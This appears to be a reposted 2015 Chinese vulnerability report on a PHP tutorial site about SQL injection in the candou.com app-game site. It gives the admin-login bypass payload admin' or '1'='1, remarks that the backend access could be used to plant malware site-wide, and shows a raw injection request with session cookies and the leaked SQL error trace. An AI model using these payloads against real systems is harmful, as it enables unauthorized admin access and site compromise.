网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

蚕豆网应用管理后台SQL注射可导致全站挂马 - 网

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] http: appgame candou comadmin 39; or 39;1 39;= 39;1admin 39; or 39;1 39;= 39;1直接进入后台如果我直接编辑添加游戏神马的~~你懂得挂马什么的。。。你们全站权限基本都在这了。后台还有个注入...

http://appgame.candou.com


admin' or '1'='1

admin' or '1'='1

直接进入后台
 

K0EN{{4{M7MQALW%E(C~L@0.jpg


 

H%KNEV%U)O[2GXXIE@(0KCX.jpg



如果我直接编辑添加游戏神马的~~你懂得挂马什么的。。。你们全站权限基本都在这了。

后台还有个注入
 

POST /iphone/home/search HTTP/1.1
Host: appgame.candou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
DontTrackMeHere: gzip, deflate
Referer: http://appgame.candou.com/iphone/home/search
Cookie: FBMD_af83_saltkey=LVYbgnY1; FBMD_af83_lastvisit=1406952229; FBMD_af83_sid=UO1Z31; FBMD_af83_lastact=1406959118%09user.php%09; FBMD_af83_st_p=0%7C1406955874%7Cf8aca706683ba6cfbc79f2fffe4753c9; FBMD_af83_visitedfid=49; FBMD_af83_viewid=tid_10100; FBMD_af83_home_diymode=1; FBMD_af83_ulastactivity=e864H98QCz%2Faky5%2Bn952RcOf2CNnIpaKn%2B%2Fv6zjMaWK%2B9et2JkSk; FBMD_af83_auth=20aeDXDgSiV%2FtMoaTnTTRdoWlgwu2WqQwck2aUkgzlOESyH3nOtzvLDuwDUx2O%2FstFVgvVlYRrYGpKrsLMLsYO4; FBMD_af83_lastcheckfeed=194%7C1406956137; FBMD_af83_lip=61.232.3.8%2C1406958708; FBMD_af83_security_cookiereport=29fdKRVVmcDsO6u2JmCONR%2BWCR5foOYR6u29EQkRFPk2j16EDJrI; FBMD_af83_sina_bind_194=-1; c85272602367782310589=4350V66KbTH1537G0HclPaGnqFpPyBrycQqQ7hnGvkG%2BwGFYcW3dc86tRFexfrB5AUFEs8VsfCyiqGJbISMd0Nn8GO9UqmDCSNRc1Oym3QJ6wA8zR5MwY3hKKjedsYBkKYiI1FTUultqO5CqVtQWm9AROnI2BHSiiAR6ZPpvmmp1xmLRWYjqTsgemVWSLZcIECCKS4UH76h72wCqqaT32IeX3EjM3UCnf7V5I%2BN6ofTGvBMznTw%2BLVVsQD0TVOpJBLN5mUWxEl%2FP69H33f5g0eksxwY0jOfLIHBXC56lARDEjxTwSWuf170ZvSY39HbrL5Elom0NnvyUvV5%2BnJ1mXXJpeWBLOagj41AsoVGHwyH%2Fjbvuj3OALKPk%2BHxUhaVf%2BV1BdP8ssQGf0hNIJLWk4Uz2wer5vshTwVJxfZDVp%2FbE6PhZKhnfk1n3C7q4GOIERbZoVlNJPQu0oKQVYM0kDlLrwT%2BhDSr3H6Y8SyIz9m3L1DUgWwAnfH2BCnBaXOufhc5r0DgHtZYH3IrLxUB%2FWRPGkR%2BTjqzjit0j9VwIHbCYgxmRd0KBHK8fFQhXJ0JwsxWmu1W3HlGD; FBMD_af83_connect_is_bind=1; FBMD_af83_nofavfid=1; FBMD_af83_checkupgrade=1; PHPSESSID=jijeolqm8helfu24eoog3fidl1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

at=id&search=#




 

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Sat, 02 Aug 2014 06:06:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.5.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2805

<pre><br>object(Sow\sys\Exception)#15 (8) {
  ["string":"Exception":private]=>
  string(0) ""
  ["file":protected]=>
  string(25) "/web/lib/Sow/mysql/db.php"
  ["line":protected]=>
  int(287)
  ["trace":"Exception":private]=>
  array(6) {
    [0]=>
    array(6) {
      ["file"]=>
      string(25) "/web/lib/Sow/mysql/db.php"
      ["line"]=>
      int(89)
      ["function"]=>
      string(15) "_throwException"
      ["class"]=>
      string(12) "Sow\mysql\db"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [1]=>
    array(6) {
      ["file"]=>
      string(39) "/web/site/appgame/www/models/Iphone.php"
      ["line"]=>
      int(203)
      ["function"]=>
      string(5) "query"
      ["class"]=>
      string(12) "Sow\mysql\db"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(1) {
        [0]=>
        string(297) "select `application_id` AS 'AppID', `alias`AS 'AppName',`current_version` AS 'AppVersion' ,`category_id`  AS 'AppCategory',`downloads` AS 'AppDownloadCount', `release_date` as 'AppUpdateTime', `display_order2` as 'DisplayOrder' FROM `tb_application` where `status`='publish' and `application_id`=#"
      }
    }
    [2]=>
    array(6) {
      ["file"]=>
      string(57) "/web/site/appgame/www/modules/Iphone/controllers/Home.php"
      ["line"]=>
      int(241)
      ["function"]=>
      string(6) "search"
      ["class"]=>
      string(12) "Iphone_Model"
      ["type"]=>
      string(2) "::"
      ["args"]=>
      array(4) {
        [0]=>
        string(2) "id"
        [1]=>
        string(1) "#"
        [2]=>
        string(1) "1"
        [3]=>
        string(2) "15"
      }
    }
    [3]=>
    array(4) {
      ["function"]=>
      string(12) "searchAction"
      ["class"]=>
      string(15) "Home_Controller"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [4]=>
    array(6) {
      ["file"]=>
      string(20) "/web/lib/Sow/bug.php"
      ["line"]=>
      int(122)
      ["function"]=>
      string(3) "run"
      ["class"]=>
      string(15) "Yaf\Application"
      ["type"]=>
      string(2) "->"
      ["args"]=>
      array(0) {
      }
    }
    [5]=>
    array(6) {
      ["file"]=>
      string(31) "/web/site/appgame/www/index.php"
      ["line"]=>
      int(20)
      ["function"]=>
      string(4) "http"
      ["class"]=>
      string(7) "Sow\bug"
      ["type"]=>
      string(2) "::"
      ["args"]=>
      array(0) {
      }
    }
  }
  ["message":protected]=>
  string(146) "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
  ["code":protected]=>
  int(1064)
  ["previous":protected]=>
  NULL
  ["previous":"Exception":private]=>
  NULL
}
<hr></pre>

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论